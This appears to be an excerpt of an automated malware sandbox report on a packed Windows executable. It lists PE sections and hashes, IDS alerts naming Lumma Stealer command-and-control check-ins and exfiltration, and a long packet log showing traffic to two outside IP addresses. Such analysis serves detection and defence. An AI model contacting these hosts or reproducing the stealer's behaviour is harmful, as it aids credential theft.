                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x7940550x69.idata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x7920000x53c.rsrc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x7941f80x8.idata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                        0x20000x7900000x518a009bad2a9ddda64eae69c1423ecab0f850unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .rsrc0x7920000x53c0x400d719efedd7f7607e6cedae2d41d0b7e4False0.68359375data5.663825919736309IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .idata 0x7940000x20000x200a0232179652c49de360269397bdb9ecaFalse0.150390625data1.0043697745670233IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        0x7960000x29e0000x2005cd291466398d298f2bd68363c389880unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        fsurptkt0xa340000x1a40000x1a3200a7d6b5e3f9defa7c78a093a47c1ff8a7False0.9944674079182821OpenPGP Public Key7.953041341484228IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        mtouvxvi0xbd80000x20000x600aa5bca6034407efa50c45b33e9034974False0.6015625data5.112541887484424IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .taggant0xbda0000x40000x22000fc3c68677b91c6f572f3b1bb8d23fe3False0.04790900735294118DOS executable (COM)0.4832992383468795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                        RT_VERSION0xbd6bac0x244data0.4689655172413793
                                                                                                                                                                        RT_MANIFEST0xbd6df00x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                        DLLImport
                                                                                                                                                                        kernel32.dlllstrcpy
                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                        2024-12-28T09:56:59.566499+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249718104.21.2.51443TCP
                                                                                                                                                                        2024-12-28T09:57:00.389426+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1249718104.21.2.51443TCP
                                                                                                                                                                        2024-12-28T09:57:00.389426+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1249718104.21.2.51443TCP
                                                                                                                                                                        2024-12-28T09:57:01.657556+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249721104.21.2.51443TCP
                                                                                                                                                                        2024-12-28T09:57:02.458749+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1249721104.21.2.51443TCP
                                                                                                                                                                        2024-12-28T09:57:02.458749+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1249721104.21.2.51443TCP
                                                                                                                                                                        2024-12-28T09:57:04.092642+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249722104.21.2.51443TCP
                                                                                                                                                                        2024-12-28T09:57:06.345220+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249723104.21.2.51443TCP
                                                                                                                                                                        2024-12-28T09:57:08.729694+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249724104.21.2.51443TCP
                                                                                                                                                                        2024-12-28T09:57:11.179091+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249725104.21.2.51443TCP
                                                                                                                                                                        2024-12-28T09:57:12.023579+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.1249725104.21.2.51443TCP
                                                                                                                                                                        2024-12-28T09:57:13.643766+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249726104.21.2.51443TCP
                                                                                                                                                                        2024-12-28T09:57:17.397219+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249728104.21.2.51443TCP
                                                                                                                                                                        2024-12-28T09:57:18.198459+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1249728104.21.2.51443TCP
                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Dec 28, 2024 09:56:36.596054077 CET49711443192.168.2.123.218.7.103
                                                                                                                                                                        Dec 28, 2024 09:56:36.596102953 CET443497113.218.7.103192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:36.596177101 CET49711443192.168.2.123.218.7.103
                                                                                                                                                                        Dec 28, 2024 09:56:36.603445053 CET49711443192.168.2.123.218.7.103
                                                                                                                                                                        Dec 28, 2024 09:56:36.603476048 CET443497113.218.7.103192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:38.401170969 CET443497113.218.7.103192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:38.432570934 CET49711443192.168.2.123.218.7.103
                                                                                                                                                                        Dec 28, 2024 09:56:38.432605028 CET443497113.218.7.103192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:38.433811903 CET443497113.218.7.103192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:38.433898926 CET49711443192.168.2.123.218.7.103
                                                                                                                                                                        Dec 28, 2024 09:56:38.523180962 CET49711443192.168.2.123.218.7.103
                                                                                                                                                                        Dec 28, 2024 09:56:38.523382902 CET443497113.218.7.103192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:38.627373934 CET49711443192.168.2.123.218.7.103
                                                                                                                                                                        Dec 28, 2024 09:56:38.627398968 CET443497113.218.7.103192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:38.670610905 CET49711443192.168.2.123.218.7.103
                                                                                                                                                                        Dec 28, 2024 09:56:38.711330891 CET443497113.218.7.103192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:39.210536003 CET443497113.218.7.103192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:39.210720062 CET443497113.218.7.103192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:39.210793972 CET49711443192.168.2.123.218.7.103
                                                                                                                                                                        Dec 28, 2024 09:56:39.211869001 CET49711443192.168.2.123.218.7.103
                                                                                                                                                                        Dec 28, 2024 09:56:39.211890936 CET443497113.218.7.103192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:53.637619972 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:53.757579088 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:53.757719994 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:53.758671045 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:53.878274918 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:53.878319979 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:53.878349066 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:53.878376007 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:53.878386021 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:53.878433943 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:53.878448009 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:53.878468990 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:53.878565073 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:53.878570080 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:53.878576994 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:53.878659010 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:53.878779888 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:53.878793001 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:53.878860950 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:53.997847080 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:53.997963905 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:53.997987986 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:53.998008013 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:53.998038054 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:53.998133898 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:53.998179913 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:53.998183966 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:53.998204947 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:53.998224974 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:53.998264074 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:54.041857004 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.041955948 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:54.157929897 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.158052921 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:54.201936007 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.318305969 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.318434954 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:54.525857925 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.526053905 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:54.765846968 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.765966892 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:54.772185087 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.772456884 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:54.772540092 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:54.885457039 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.885566950 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:54.893167019 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.893172026 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.893177986 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.893182993 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.893210888 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.893214941 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.893218994 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.893223047 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.893232107 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.893235922 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.893239021 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.893243074 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.893265009 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:54.893302917 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:54.893348932 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.893414974 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:54.893549919 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.893554926 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.893605947 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:54.893701077 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.893704891 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.893827915 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.893834114 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.894006968 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.894011974 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.894181967 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.894186020 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.894332886 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.894336939 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.894480944 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:54.894490957 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.894546986 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:54.894656897 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.894660950 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.894723892 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:54.895176888 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:54.895230055 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:55.005140066 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.005290031 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:55.012830019 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.012901068 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:55.012948990 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.013048887 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:55.013051033 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.013096094 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:55.013135910 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.013247013 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.013290882 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.013386965 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.013467073 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.013581038 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.013664007 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.013730049 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.013834000 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.013931990 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.014062881 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.014131069 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.014241934 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.014379978 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.014422894 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.014466047 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.014493942 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.014539957 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.014640093 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.014645100 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.014662981 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:55.014723063 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:55.014775991 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.014837027 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:55.014864922 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.014869928 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.014908075 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.014951944 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:55.015018940 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.015057087 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.015063047 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:55.015125990 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.015161991 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.015292883 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.015297890 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.015377045 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.015381098 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.015455008 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.015480042 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.015578032 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.015582085 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.015629053 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.015717983 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.015722990 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.015736103 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.015772104 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.015775919 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.015904903 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.015938997 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.016037941 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.016041994 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.016155005 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.016202927 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.016237020 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.016285896 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.016383886 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.016388893 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.016428947 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.016433001 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.125380993 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.125519991 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.132571936 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.132582903 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.132761955 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.132806063 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.132896900 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.132913113 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.133013010 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.133291006 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:55.133383989 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:55.134212971 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.134255886 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.134260893 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.134372950 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.134397030 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.134506941 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.134510994 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.134632111 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.134637117 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.134687901 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.134692907 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.134861946 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.134869099 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.135020018 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.135025024 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.135059118 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.135140896 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.135181904 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.135222912 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.135400057 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.135405064 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.135591984 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.135632038 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.135703087 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.135756969 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.135802031 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.135826111 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.135950089 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.135963917 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.136058092 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.136163950 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.136168957 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.136198997 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.136213064 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.136341095 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.136362076 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.136466980 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.136569023 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.136579037 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.136706114 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.138114929 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.138119936 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.139451027 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.139621019 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.139760017 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.139765024 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.139769077 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.139779091 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.139859915 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.139864922 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.139868975 CET8049714194.87.58.92192.168.2.12
